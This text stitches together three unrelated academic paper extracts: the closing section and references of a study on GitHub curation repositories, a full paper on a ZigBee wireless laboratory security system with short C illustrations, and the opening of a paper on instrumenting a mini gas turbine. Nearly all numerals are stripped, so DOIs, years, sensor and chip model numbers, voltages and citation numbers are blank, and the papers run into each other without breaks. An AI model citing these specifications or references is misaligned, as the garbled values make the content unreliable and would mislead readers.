criteria for identifying repositories to further develop our findings. finally, all of the curators we investigated were recruited on public github, so our results may not generalize to closed source systems. this is another direction for subsequent research to develop our initial findings. conclusion this study seeks to close a gap in the literature by providing a greater understanding of the motivations that software developers appropriate github for curation, and their experiences with that practice. by conducting in-depth interviews with participants about their curation experiences, we uncovered that curators were motivated by altruism, personal needs, and peer recognition, which were comparable to motivations to participate in open source projects. whether these motivations support long-term participation in curation practice is yet to be discovered. curation repository is an appropriation of an online collaborative working tool, indicating that software developers’ community starts to leverage github as a tool for communicating socially generated knowledge. 
it reflects the flexibility and reconfigurability of the tool. and other similar practices, such as sharing course curriculum on github, start to surface. in addition, curation repositories serve important functions of communities of practice. they support software developers’ work, guide learning through an engineering topic, and communications within the community. curation practice strengthens software developers’ community and can help it grow. finally, current curation practices are limited by lacking standard formatting, tools for helping curators find and maintain existing curated resources, and reaching the target audience, which creates opportunities for future improvements. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the authors received no funding for this work. competing interests john m. carroll is an academic editor for peerj computer science. author contributions • yu wu conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • na wang conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • jessica kropczynski conceived and designed the experiments, contributed reagents/ma- terials/analysis tools, wrote the paper, reviewed drafts of the paper, suggested relevant works and possible framing. • john m. carroll conceived and designed the experiments, contributed reagents/materi- als/analysis tools, wrote the paper, reviewed drafts of the paper, guided and oversaw the entire process. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the study was approved by penn state university institutional review board. data availability the following information was supplied regarding data availability: the interview transcripts have been uploaded as supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references bamforth db. . technological efficiency and tool curation. american antiquity : – . burt rs. . structural holes and good ideas. american journal of sociology ( ): – doi . / . burt rs. . brokerage and closure: an introduction to social capital. oxford: oxford university press. carroll jm. . the neighborhood in the internet: design research projects in community informatics. new york: routledge. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. dabbish l, stuart c, tsay j, herbsleb j. . social coding in github: transparency and collaboration in an open software repository. in: proceedings of the conference on computer supported cooperative work. new york: acm, – . dabbish l, stuart c, tsay j, herbsleb j. . leveraging transparency. ieee software ( ): – doi . /ms. . . doll b. . million repositories. available at https://github.com/blog/ - - million-repositories (accessed on december ). duh k, hirao t, kimura a, ishiguro k, iwata t, yeung c-ma. . 
creating stories: social curation of twitter messages. in: proc. icwsm . farooq u, kannampallil tg, song y, ganoe ch, carroll jm, giles l. . evaluating tagging behavior in social bookmarking systems: metrics and design heuristics. in: proceedings of the international acm conference on supporting group work. new york: acm, – . golder sa, huberman ba. . usage patterns of collaborative tagging systems. journal of information science ( ): – doi . / . greene d, reid f, sheridan g, cunningham p. . supporting the curation of twitter user lists. arxiv preprint. arxiv: . . guba eg. . criteria for assessing the trustworthiness of naturalistic inquiries. educational communication and technology journal : – . hars a, ou s. . working for free? motivations of participating in open source projects. in: proceedings of the th annual hawaii international conference on system science. piscataway: ieee. higgins s. . digital curation: the emergence of a new discipline. international journal of digital curation ( ): – doi . /ijdc.v i . . hoepfl mc. . choosing qualitative research: a primer for technology education researchers. journal of technology education ( ): – doi . /jte.v i .a. . jenkins h, purushotma r, weigel m, clinton k, robison aj. . confronting the challenges of participatory culture: media education for the st century. cambridge: mit press. lacey a, luff d. . qualitative data analysis. sheffield: trent focus. lakhani k, wolf rg. . why hackers do what they do: understanding motivation and effort in free/open source software projects. mit sloan working paper no. - . cambridge: mit. lave j, wenger e. . situated learning: legitimate peripheral participation. cambridge: cambridge university press. lincoln ys, guba eg. . naturalistic inquiry. beverly hills: sage publications, inc. marlow j, dabbish l, herbsleb j. . impression formation in online peer production: activity traces and personal profiles in github. in: proceedings of the conference on computer supported cooperative work. new york: acm, – . marlow c, naaman m, boyd d, davis m. . ht , tagging paper, taxonomy, flickr, academic article, to read. in: proceedings of the th conference on hypertext and hypermedia. new york: acm, – . wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ms. . https://github.com/blog/ - -million-repositories https://github.com/blog/ - -million-repositories http://dx.doi.org/ . / http://arxiv.org/abs/ . http://dx.doi.org/ . /ijdc.v i . http://dx.doi.org/ . /jte.v i .a. http://dx.doi.org/ . /peerj-cs. marshall mn. . sampling for qualitative research. family practice ( ): – doi . /fampra/ . . . matthews t, whittaker s, badenes h, smith b. . beyond end user content to collaborative knowledge mapping: interrelations among community social tools. in: proceedings of the th conference on computer supported cooperative work & social computing. new york: acm, – . mcdonald n, goggins s. . performance and participation in open source software on github. in: chi’ extended abstracts on human factors in computing systems. new york: acm, – . singer l, figueira filho f, cleary b, treude c, storey m-a, schneider k. . mutual assessment in the social programmer ecosystem: an empirical investigation of developer profile aggregators. in: proceedings of the conference on computer supported cooperative work. new york: acm, – . singer p, flöck f, meinhart c, zeitfogel e, strohmaier m. . evolution of reddit: from the front page of the internet to a self-referential community? 
in: proceedings of the rd international conference on world wide web. new york: acm, – . storey m-a, singer l, cleary b, figueira filho f, zagalsky a. . the (r) evolution of social media in software engineering. in: proceedings of the future of software engineering. new york: acm, – . strauss al. . qualitative analysis for social scientists. cambridge: cambridge university press. van liere d. . how far does a tweet travel?: information brokers in the twitterverse. in: proceedings of the international workshop on modeling social media . new york: acm, : – : . wenger e. . communities of practice: learning, meaning, and identity. cambridge: cambridge university press. wenger ec, snyder wm. . communities of practice: the organizational frontier. harvard business review ( ): – . wu y, kropcznyski j, prates r, carroll jm. . the rise of curation on github. in: third aaai conference on human computation and crowdsourcing . wu y, kropczynski j, shih pc, carroll jm. . exploring the ecosystem of software developers on github and other platforms. in: proceedings of the companion publication of the th conference on computer supported cooperative work & social computing. new york: acm, – . ye y, kishida k. . toward an understanding of the motivation of open source software developers. in: proceedings of the th international conference on software engineering. piscataway: ieee, – . zhong c, shah s, sundaravadivelan k, sastry n. . sharing the loves: understanding the how and why of online content curation. in: proceedings of the seventh interna- tional aaai conference on weblogs and social media. – . wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /fampra/ . . http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - design and research of security system in university laboratory ding li school of health services management xi’an medical university, xi’an, shaanxi, china e-mail: dingli@xiyi.edu.cn shi xuerong school of health services management xi’an medical university, xi’an, shaanxi, china e-mail: @qq.com zhang dujuan school of health services management xi’an medical university, xi’an, shaanxi, china e-mail: zhangdj sx@ .com su yulei school of health services management xi’an medical university, xi’an, shaanxi, china e-mail: @qq.com abstract—the laboratory is an important place for teaching and scientific research in major universities, and plays an important role in the work of universities. the resources equipped by the laboratory occupy a large part of the resources of the entire school. the laboratory security system plays an important role in ensuring the safety of the laboratory and preventing the loss of equipment. today's laboratory security systems have factors such as low automation, insufficient management, and inadequate safety in the experimental environment. moreover, most security systems are built using wired methods, which have problems such as cumbersome wiring, aging lines, and difficult maintenance. in view of the many problems in the current laboratory management, this paper proposes a security system designed and implemented by the zigbee technology of the internet of things. the system uses a wireless network to monitor laboratory access control and the environment, realizing the intelligence of the laboratory security system. keyword-internet of things (iot); sensor; security i. 
introduction in the field of security, with the diversification of networking methods, hardware and software platforms and application technologies, the implementation of security systems has become more and more diverse. at present, the laboratory security system has a large number of alarm constraints and redundancy, and poor real-time monitoring. in response to this series of problems, this paper uses the internet of things and other related technologies to carry out research work on the laboratory security system design, and proposes a set networked laboratory security system. the system uses sensor design nodes to form a zigbee wireless sensor network to realize the collection of environmental information in the laboratory, thereby automatically monitoring the occurrence of some security risks. ii. iot technology internet of things (abbreviation: iot) originated in the media field and is the third revolution of the international journal of advanced network, monitoring and controls volume , no. , information technology industry[ ]. the internet of things refers to connecting any object with the network through information sensing equipment according to the agreed protocol, and the objects exchange information and communicates, through the information transmission medium to achieve intelligent identification, positioning, tracking, supervision and other functions. there are two key technologies in iot applications, namely sensor technology and embedded technology[ ]. unlike traditional networks, the terminal of the internet of things technology is no longer a pc, and its terminal is an embedded computer system and its supporting sensors. the internet of things technology is widely used in industrial, medical, transportation and other fields. iii. network topology a typical zigbee network supports three topologies, namely a star network topology, a tree network topology, and a mesh network topology. the star network topology is composed of a network main coordinator and multiple terminal equipment nodes. the main coordinator node is an ffd device. in a star topology, each terminal node can only communicate with the coordinator node, and each terminal node cannot transmit data. the tree topology is composed of a network coordinator and multiple terminal equipment nodes and routing nodes. the main coordinator and the routing node can have their own child nodes, and the terminal device node can autonomously choose to join the coordinator or the router node. the tree structure follows the order of parent node and child node, that is, each terminal node has its fixed parent node, which must be passed through the parent node layer by layer. the advantage of this topology is that the network coverage is large, but if one of the parent nodes is damaged, all the child nodes connected to it will be unable to communicate. the mesh topology is also composed of a coordinator node, multiple terminal device nodes and router nodes. this structure is different from the tree network structure in that all routing nodes can communicate with each other, and there is no strict communication sequence. when a routing node fails, data can be transmitted through other routing nodes. this topology not only reduces the delay of information transmission, but also improves the routing efficiency and reliability. through the corresponding routing algorithm, the best path can be found. 
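to make the fail-over behaviour of the mesh topology concrete, the short sketch below runs a breadth-first search over a small, made-up five-node topology and shows that the end node can still reach the coordinator after one routing node fails. it illustrates the idea only; it is not the routing algorithm actually used by zigbee.

```c
/* illustrative sketch of the mesh-routing idea described above: if one routing
 * node fails, a breadth-first search over the remaining links still finds a
 * path from a sensor node to the coordinator. the 5-node topology is made up. */
#include <stdio.h>
#include <string.h>

#define N 5   /* 0 = coordinator, 1-3 = routers, 4 = sensor end node */

int shortest_hops(const int link[N][N], const int failed[N], int src, int dst) {
    int dist[N], queue[N], head = 0, tail = 0;
    memset(dist, -1, sizeof dist);
    dist[src] = 0;
    queue[tail++] = src;
    while (head < tail) {
        int u = queue[head++];
        if (u == dst) return dist[u];
        for (int v = 0; v < N; v++)
            if (link[u][v] && !failed[v] && dist[v] < 0) {
                dist[v] = dist[u] + 1;
                queue[tail++] = v;
            }
    }
    return -1;  /* coordinator unreachable */
}

int main(void) {
    int link[N][N] = {
        {0,1,1,0,0},   /* coordinator links to routers 1 and 2 */
        {1,0,1,1,0},
        {1,1,0,1,0},
        {0,1,1,0,1},   /* router 3 serves the end node */
        {0,0,0,1,0},
    };
    int failed[N] = {0,0,0,0,0};
    printf("hops with all routers up: %d\n", shortest_hops(link, failed, 4, 0));
    failed[1] = 1;     /* one router goes down; traffic reroutes via router 2 */
    printf("hops with router 1 down:  %d\n", shortest_hops(link, failed, 4, 0));
    return 0;
}
```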
according to the current status of the laboratory, the range of experiments that needs to be monitored is large, and the types of data monitored are many. from a practical point of view, the wireless network that needs to be established should support dynamically deleting and adding nodes at any time. according to these characteristics, a mesh topology is more suitable for the current laboratory system. the mesh topology offers strong stability and has a clear advantage in a large-scale laboratory monitoring system.

iv. structure design of laboratory security system
the laboratory security system mainly relies on the monitoring of the laboratory environment to determine potential safety hazards or the presence of suspicious persons[ ]. various types of sensors are arranged in the monitoring range. these sensors are connected to the terminal nodes and placed in different locations in the laboratory. the system uses infrared sensors to monitor whether there are people in the room, door magnetic sensors to detect whether someone breaks in through a door or window, smoke and temperature sensors to detect the presence of fire in the laboratory, and harmful gas sensors to detect the leakage of pharmaceutical reagents. when an abnormality occurs, the sensor in the detection unit will send out an alarm signal, and the alarm signal will be transmitted through the communication unit to the monitoring center software via the zigbee network. the structure of the laboratory security system is shown in figure .

figure . laboratory security system structure

v. system hardware design
a. monitoring unit design
the detection unit is mainly composed of an infrared sensor, a door magnetic sensor, a smoke sensor, a temperature sensor, and harmful gas and combustible gas sensor modules. the infrared sensor is mainly used to detect whether there are outsiders in the laboratory. the system uses a pyroelectric infrared sensor, which detects the infrared radiation radiated by the human body in a non-contact manner to determine whether someone is in the surveillance area. this system uses the human body infrared sensor module hc-sr . this module is fully automatic: when someone enters the sensing range, the module will automatically output a high level, and as long as it continues to sense the presence of a person it keeps outputting a high level; once it no longer detects a person, the output switches from high level to low level. the wireless door magnetic sensor is a device commonly used in security systems, mainly used to detect whether the doors and windows are opened or closed illegally. when the wireless door sensor collects the signal that the door is open, it sends an alarm signal. the combustible gas sensor is a detector used to detect the combustible gas content in the air. the system uses the mq- sensor to measure the combustible gas concentration[ ]. when the sensor detects that the combustible gas content in the air reaches or exceeds the threshold, it sends an alarm signal. the temperature sensor adopts the ds b digital sensor, which is small in size and easy to use. the interface mode is single-wire, which can realize the networking function of multiple sensors. the harmful gas sensor module is designed for the effective detection of many gases such as ammonia, sulfide, methane, and carbon monoxide.
the mq sensor is used for the detection of harmful gas content[ ]. b. communication unit design the communication unit is mainly responsible for data transmission in the wireless sensor network environment monitoring system, which is the core part of the entire system. data is transmitted through a large number of wireless sensor network nodes arranged in the network. the mutual communication between the various nodes realizes the communication of the entire network and forms the communication unit of the system. the node structure designed in the wireless international journal of advanced network, monitoring and controls volume , no. , sensor network is shown in figure . it is mainly composed of three parts: wireless node module, sensor module and power intelligent main board. power motherboard c c w ire le ss in te rfa ce in te rfa ce single chip microcomputer se n so r r s sensor module m ic ro c o n tro lle r figure . wireless sensor network node the microcontroller in the sensor module selects stc c rc produced by stc. the controller has the characteristics of high speed and low power consumption. it uses an enhanced core, the calculation speed is higher than the ordinary . the controller can wake up the idle mode at any time to reduce power consumption and ensure that the end node power supply is used for a longer time. the wireless node module selects cc chip as the microcontroller of the module. the cc chip is compatible with various zigbee standards, and has the characteristics of stable performance, low power consumption, and strong anti-interference ability[ ]. the sensor module is arranged in the monitoring environment and is responsible for data collection and transmission in different areas, and transmits the collected data information to the coordinator. if it cannot be directly transmitted, it is transmitted to the coordinator in a multi-hop manner. the design part of the power module chooses to use an input voltage of v, and the microcontroller and various sensors on the front-end measurement version use a v power supply[ ]. the zigbee module cc uses a . v power supply, so the system uses a voltage regulator to convert the v voltage it is v voltage. at the same time, the v voltage is reduced to . v through the voltage regulator tube, which is used to provide power for the zigbee module. vi. system software design zigbee is a wireless transmission technology based on the ie . . standard specification[ ]. it has the characteristics of self-organizing network, low cost, low power consumption, and enemy complexity [ ]. it does not need to apply for authorization for the working frequency band, which is convenient and cost-effective to use. the system uses zigbee to develop a set of wireless sensor networks according to the actual monitoring needs in the laboratory, and the data transmission between the nodes in the network is transmitted using the zigbee protocol. the laboratory monitoring system mainly includes terminal node coordinator, terminal node and routing node. the coordinator is responsible for forming a network, collecting data, and providing an interface with a computer to realize the formation of a sensor network and the establishment of a data transmission channel. the terminal node is responsible for collecting data information in the laboratory, including temperature, smoke, and harmful gases. 
these data are processed by the microcontroller, transmitted to the zigbee network via the wireless network module, and finally transmitted to the coordinator, which is then transmitted to the monitoring center to realize the collection and transmission of laboratory environmental data. the routing node is responsible for the signal enhancement and forwarding of the data. because the monitoring area is large, some data may be lost during the transmission process. to avoid this situation, a routing node is designed in the network to enhance and forward the data signal. , to ensure the stability and accuracy of data transmission throughout the network.. a. terminal node design ) design of sensor data acquisition module international journal of advanced network, monitoring and controls volume , no. , the system data acquisition module uses -microcontroller, through c language programming, to achieve sensor status and data acquisition, judgment and so on. these data are sent to the wireless network through the zigbee module and transmitted to the coordinator. the flow chart of the sensor data acquisition module software design is shown in figure . get command data collection determine whether the test command is received cyclic detection of sensor data determine if there is an exception send to coordinator or router end start no yes no obtain yes figure . software design flow chart of information collection module after the data acquisition module software is running, it reads the background from the serial port of the zigbee module to obtain background commands, collects the status of the sensors connected to the module, and sends the data to the network. if there is no background acquisition command, the program cyclically executes the acquisition sensor status command, and judges whether there is an abnormal situation in the laboratory through the sensor status data. if abnormal data appears, send laboratory status data to the monitoring center, and if there is no abnormality, continue to collect laboratory sensor data. ) wireless network module design the information collected by each terminal node in this system is different. according to different sensors, multiple data will be collected within the scope of laboratory monitoring. in order to realize the data transmission in the system, it is necessary to establish a network and add these terminal nodes to it. in this system, the terminal node sends a request to join the network to the coordinator. the coordinator determines whether to allow joining according to the situation, responds to the request and sends it to the terminal node, so as to join the network and perform data transmission. the flow chart is shown in figure . initialization send a signal to join the network is it successful to join the network? start data collection yes whether an alarm signal is detected send alarm information yes no no figure . end node flow chart international journal of advanced network, monitoring and controls volume , no. , the terminal node first finds the coordinator node in the network, and scans again if it is not found until it is found. then send the association request command, wait for the coordinator to process, if you agree, then join the network, and get a short -bit address assigned, the terminal node sends data to the coordinator through the network. b. coordinator node design the main role of the coordinator is to create the entire network and serve as a bridge between the terminal nodes and the control center. 
it needs to receive all kinds of data collected by terminal nodes and routing nodes through zigbee wireless communication protocol, and then send it to the monitoring center. in the entire system, the coordinator must be a full-function device, and there can only be one coordinator node in a network, so the coordinator initialization setting is required at the time of design. the flow chart is shown in figure . the coordinator in the network is responsible for constructing the entire network, and adopts the method of ad hoc network to construct. ) determine network coordinator the process is to determine whether the node is an ffd node, and then to determine whether the ffd node is in another network or whether a coordinator already exists in the network[ ]. through active scanning, send a beacon request command, and then set a t_scan_duration, if no beacon is detected within the scanning period, then it is considered that ffd does not have a coordinator in the entire network, it can build your own zigbee network, and as this the network coordinator continuously generates beacons and broadcasts them. ) carry out the channel scanning process it includes two processes: energy scanning and active scanning. first, perform energy detection on the specified channel or the default channel to avoid possible interference. then carry out active scanning to search for network information within the communication radius of the node. this information is broadcast on the network in the form of beacon frames. the node obtains these beacon frames through active channel scanning, and then selects a suitable channel based on this information. initialization create a new network display network information enter the wireless monitoring state is there an application signal? whether there is an alarm signal? no send an alarm signal yes assign network number yes no figure . coordinator node program flow chart ) set the network id after finding a suitable channel, the coordinator will select a network identifier (pan id) for the network. there are two address modes in the zigbee network: extended address ( -bit) and short address ( -bit), where the extended address is assigned by the ieee organization and is used for unique device identification. international journal of advanced network, monitoring and controls volume , no. , after the above steps are completed, the zigbee mesh network is successfully initialized, and then waits for other nodes to join. after the node successfully joins the network, it will get a short network address and send and receive data through this address. the flow chart of ad hoc network is shown in figure . initialization set panid and channel build a network and allow to join wait for the node to join whether the node joins the network? yes no receive data start figure . coordinator ad hoc network flow chart c. design of routing nodes as a relay node of the entire detection system, routing nodes are suitable for environmental monitoring in a large area. in wireless sensor networks, it may not be possible to connect and communicate because of the long distance between nodes. at this time, the routing node acts as a relay station to connect the terminal node and the coordinator. when setting up a routing node, you need to first initialize the cc device and protocol stack, send a signal to join the network, the front-end coordinator will respond accordingly, agree to join the network, and assign a network address. 
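the channel-selection step just described (an energy scan followed by an active scan, then picking a suitable channel) can be illustrated with the short, self-contained c sketch below; the per-channel scan results are hard-coded stand-ins for what the radio would actually report, and the preference for the quietest unused channel is an assumption about the selection policy.

```c
/* illustrative sketch of the channel-selection step described above: the
 * coordinator scans channels 11-26, then prefers the quietest channel that no
 * existing pan is already using. the scan results here are hard-coded stand-ins
 * for what the radio's energy detection and beacon scan would return. */
#include <stdio.h>

#define FIRST_CHANNEL 11
#define NUM_CHANNELS  16

int select_channel(const int energy[NUM_CHANNELS], const int pans_found[NUM_CHANNELS]) {
    int best = -1;
    for (int i = 0; i < NUM_CHANNELS; i++) {
        if (pans_found[i] > 0)
            continue;                         /* skip channels with an existing network */
        if (best < 0 || energy[i] < energy[best])
            best = i;                         /* keep the lowest-energy free channel */
    }
    return best < 0 ? -1 : FIRST_CHANNEL + best;
}

int main(void) {
    /* placeholder scan results: energy level and number of beacons heard per channel */
    int energy[NUM_CHANNELS]     = {40, 12, 55, 9, 30, 70, 22, 15, 60, 8, 44, 33, 27, 90, 18, 25};
    int pans_found[NUM_CHANNELS] = { 1,  0,  0, 0,  2,  0,  0,  0,  0, 1,  0,  0,  0,  0,  0,  0};

    int ch = select_channel(energy, pans_found);
    if (ch < 0)
        printf("no free channel found\n");
    else
        printf("coordinator will form its network on channel %d\n", ch);
    return 0;
}
```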
after the routing node joins the network, it starts the function of data forwarding, thereby ensuring the transmission of data throughout the network. the program flow figure is shown. initialization join the network enter the wireless monitoring state determine the signal received forward to next node no assign addresses to nodes yes signals to join the network alarm figure . routing node flow chart vii. communication protocol design communication protocol refers to the rules and conventions that both entities must follow to complete communication or services. the protocol defines the format used by the data unit, the information and meaning that the information unit should contain, the connection method, and the timing of information transmission and reception, so as to ensure that the data in the network is smoothly transmitted to the determined place. this system uses wireless communication, a specific communication rule designed for communication in the formulation of protocols. in the formulation of the transmission module protocol, according to the zigbee communication protocol and the needs of the actual system, the communication protocol of this system was formulated. the single transmission format is shown in table . international journal of advanced network, monitoring and controls volume , no. , table i. transmission data format fd indicates that zigbee sends data point to point, and the length indicates the total length of the piece of data. this length can determine how many bits of data need to be read, which is convenient for taking out the data. the target address stores the zigbee address of the received information. the following data represents the laboratory number, data , , and so on represent the data collected by the sensor. each node sets different data according to its sensor. the single data receiving format is shown in table . table ii. transmission data format fd means zigbee point-to-point transmission. the length represents the total length of the data, and the target address represents the zigbee address of the received message, that is, the node address to which the data needs to be sent. data represents the laboratory number. data represents the data information received by the sensor. data and data are also the information received by the sensor. the amount of this information depends on the number of sensors at the terminal node. the source address represents the zigbee address of the sent message, that is, from which node the message was received. viii. conclusion the laboratory security monitoring system mainly monitors the environment in the laboratory to alert the abnormal situation in time to avoid the economic loss caused by aging equipment or human negligence. the development of such a system has a positive effect on the laboratory construction of colleges and universities, and has certain application prospects. references [ ] zhang hui yuan yong-zhe wang wen-jun “security and intelligent system for buses based on mobile internet of things “electronic design engineering. , ( ) - . [ ] sun qi-bo liu jie li shan fan chun-xiao sun juan-juan” internet of things:summarize on concepts,architecture and key technology problem” journal of beijing university of posts and telecommunications. , ( ). - . [ ] liu qiang cui li chen hai-ming “key technologies and applications of internet of things” computer science. , ( ). - . 
[ ] han tuanjun yin jiwu zhang panfei zheng xu zheng zhengbing.” design of remote laboratory safety management system based on gprs and zigbee” experimental technology and management. , ( ) - . [ ] yan yaling li bo liu weijie.” zigbee-based laboratory fireproof remote monitoring system”. , ( ) - . [ ] jiang yunchen.” monitoring and managing system of laboratory based on campus lan and zigbee technology” experimental technology and management. , ( ). - . [ ] fan yan yu yang li yong-yi ding yi-xing “research on remote monitoring system based on zigbee wireless sensor network” research and exploration in laboratory. , ( ). - . [ ] zhang pan huo lian-song “design of an wireless temperature monitoring system based on zigbee” sensor world. , ( ). - . [ ] wang sihua zheng shuqiang ding yihua “discussion on zigbee sensor network technology and its application” radio engineering. , ( ). - . international journal of advanced network monitoring and controls volume , no. , application of computational tools to analyze and test mini gas turbine haifa el-sadi* , anthony duva mechanical engineering and technology faculty of engineering and computer science wentworth institute of technology boston, ma, usa corresponding author email: elsadih@wit.edu abstract. performance analysis and testing of the mini gas turbine was carried out in wentworth institute of technology’s thermodynamics laboratory. the computational tool allows students to focus on more design-oriented problems. furthermore, students had the ability to see immediate results to variations of the design conditions as well as different parameters that would affect the mini turbine. this project was carried out as a senior design project (capstone), the students updated the existing data acquisition system, writing a new data acquisition program in labview, installing new pressure and temperature sensors, and performing a first and second law of thermodynamics analysis on the engine in engineering equation solver. in order to update the existing data acquisition system, new ni scb- connector blocks were implemented along with ni usb- terminals. the new hardware is operated through a labview program running on a new laptop designated and mounted to the mini jet turbine housing. instrumentation, testing, and calibration are the three main milestones for this project as a result, the inlet mass flow rate numeric indicator value is calculated, not measured. the calculated value is dependent on the measured values of compressor inlet temperature (t ), compressor inlet static pressure (ps), and compressor inlet dynamic pressure (pt-ps). however, the pressure, temperature and thrust were tested as a function of rpm. the mini turbine engine is ready to be used in student experimental settings. feedback from students proves that the use of different tools significantly enhances the student learning experience and encourages the students to use different theory from different courses, make the course more dynamic, and motivate the students to learn the material. keywords: labview, engineering equation solver (ees), mini-turbine, pressure . introduction the turbine engine discussed throughout this research is a self-contained turbojet engine.this engine operates on a brayton cycle. the brayton cycle depicts the air-standard model of a gas turbine power cycle. a simple gas turbine is comprised of three main components: a compressor, a combustor, and a turbine. according to the principle of the brayton cycle, air is compressed in the compressor. 
the air is then mixed with fuel, and burned under constant pressure conditions in the combustor. the resulting hot gas is allowed to expand through a turbine to perform work. most of the work produced in the turbine is used to run the compressor and the rest is available to run auxiliary equipment and produce application of computational tools to analyze and test mini gas turbine power [ ]. gas turbine engines include internal passages which serve to channel the cooling air from compressors to the different components to be cooled. the research on the flow in a corotation radial inflow cavity was pioneered by owen et al. [ ]. they used integral momentum techniques for flows in a rotating cylindrical cavity. firouzian et al. [ , ] studied the flow and heat transfer in the cavity. their results revealed the complicated source-sink flow feature in a radial inflow rotating cavity. one of the concerns in turbomachine is the pressure loss in the cavity; different ways to minimize the pressure loss have been explored. chew et al. [ ] has used fins to reduce the pressure loss. on the other hand, x. liu [ ] has studied the flow in a corotation radial inflow cavity between turbine disk and coverplate. also, the flow field in a preswirled cooling air supply to a turbine rotor has been investigated by oliver et al. [ , ]. an analysis on this engine provides important performance characteristics such as thrust, compressor performance, turbine performance (work and power, expansion ratio, turbine efficiency), combustion/ emission analysis, and overall isentropic efficiency. in order to perform an analysis on this engine, several quantities at specific locations are needed. sensors are instrumented on this engine at the compressor inlet, compressor outlet, turbine inlet, turbine exit, and exhaust to collect data on the temperature and pressure at each location. this data is then used to perform a performance analysis on the engine. in addition, there are sensors on this engine to monitor thrust, rpm, and fuel flow rate. shown below in figure is a cross section of the engine with main components labeled. figure. turbine engine layout (brayton cycle) figure below shows the location of each temperature and pressure being measured on the engine. international journal of advanced network monitoring and controls volume , no. , figure. engine instrumentation locations shown below in table are the specifications of the engine. table engine manufacturer specifications manufacturer turbine technologies, ltd. model number dx max. rpm , max. exhaust temperature c pressure ratio . : specific fuel consumption . lb./lb.-hr t h e t u r b i n e t e c h n o l o g i e s m i n i g a s t u r b i n e i n t h e w e n t w o r t h i n s t i t u t e o f t e c h n o l o g y thermodynamics lab is in great need of an instrumentation overhaul. due to the high cost of replacing the data acquisition system completely, our team will be replacing it ourselves. the current daq system is outdated and incompatible with current software on the computer it is paired to. a new set of daq hardware will be paired with a new computer running a labview program to collect the data. our team’s goals also include calibration of pressure transducers and thermocouples for accurate measurement. our team will then run a st and nd law of thermodynamics on the system using engineering equation solver (ees). the mini gas turbine in the thermodynamics lab is a fantastic resource that is going un-used. 
many students can benefit from the mini turbine’s technical sophistication. benefits include but are not limited application of computational tools to analyze and test mini gas turbine to technical understanding, conceptual understanding, and practical application. with the recent creation of the aerospace engineering minor at wentworth, this machine could open the eyes to many young engineers and give them the ability to have a future in the aerospace industry. turbine propulsion is used on various aircraft, but dominates the commercial jet and military jet industries. the main problem of this project is to overhaul the instrumentation of the mini gas turbine and have it ready to be run for students. instrumentation, testing, and calibration are the three main milestones for this project. a technical lab will be produced for thermodynamics students to run. . instrumentaion figure below shows the laptop system mounted and installed. figure. laptop and monitor installed the new daq has several additional components which are much larger than the old system a much larger mounting bracket was necessary. after modeling all of the current system components in solidworks, a sheet metal bracket was designed to fit all of the daq components without interfering with any of the existing surrounding components. figure below shows the design of the new daq setup. figure. daq components installed international journal of advanced network monitoring and controls volume , no. , during the course of this project, there were many sensors that needed to be changed or added. the preexisting daq system was capable of collecting temperature and pressure readings from the various mini-turbine engine stages; however, there was room for improvement. one of the main additions made to the instrumentation was implementing a new pressure transducer to read the static pressure at the inlet of the nozzle. the pitot-static mast style device can be seen below in figure : figure. inlet pitot tube current set-up the basis of this project is to transition the new hardware and supported labview software. the hardware chosen for the task are the ni scb- and ni usb- . two of each have been implemented in the daq system. while attempting to calibrate the thrust strain gauge, significant noise to the ni chassis was experienced. the pre-existing set-up had the wires from the strain gauge splitting between the meter and the ni chassis. while the out-put signal from the strain gage was filtered through the dp -s, it was not filter through the ni chassis. to remedy the issue, the dp -s was replaced with a dp -s-a which had the correct analog signal output. with the new signal analog signal output, there was no noise experienced from the thrust strain gage and meter. below the new meter can be seen: . testing figure . labview data acquisition front panel user interface (plot tab) in order to calculate the inlet mass flow rate to the turbine engine, the static pressure is needed. the static pressure is obtained by connecting a pressure transducer directly to the static pressure port on the inlet pitot tube. next, the density of the air is calculated using this static pressure. the air velocity is calculated next using the dynamic pressure which is the difference between the total pressure and the static pressure. the mass flow rate is finally obtained knowing the density, velocity and cross sectional area of the inlet nozzle at the location of the pitot tube. this calculation is performed in the labview program (figure ). 
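Outside LabVIEW, the same chain of calculations (static pressure to air density, dynamic pressure to velocity, then mass flow rate through the inlet area) takes only a few lines. The sketch below assumes ideal-gas air and SI units; the numeric inputs are placeholders for illustration, not measured engine data.

```python
import math

# Inlet mass-flow computation described above, assuming ideal-gas air and SI
# units.  The example inputs are placeholders, not measured engine data.

R_AIR = 287.05          # J/(kg*K), gas constant for air

def inlet_mass_flow(t_inlet_k, p_static_pa, p_dynamic_pa, inlet_area_m2):
    """Return (density, velocity, mass flow rate) at the compressor inlet."""
    rho = p_static_pa / (R_AIR * t_inlet_k)          # rho = Ps / (R * T)
    velocity = math.sqrt(2.0 * p_dynamic_pa / rho)   # V = sqrt(2 * (Pt - Ps) / rho)
    m_dot = rho * velocity * inlet_area_m2           # m_dot = rho * V * A
    return rho, velocity, m_dot

# Placeholder example: 295 K inlet air, 101 kPa static pressure, 1.2 kPa
# dynamic pressure, 3e-3 m^2 inlet area (illustrative numbers only).
rho, v, m_dot = inlet_mass_flow(295.0, 101_000.0, 1_200.0, 3.0e-3)
print(f"density {rho:.3f} kg/m^3, velocity {v:.1f} m/s, mass flow {m_dot:.3f} kg/s")
```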
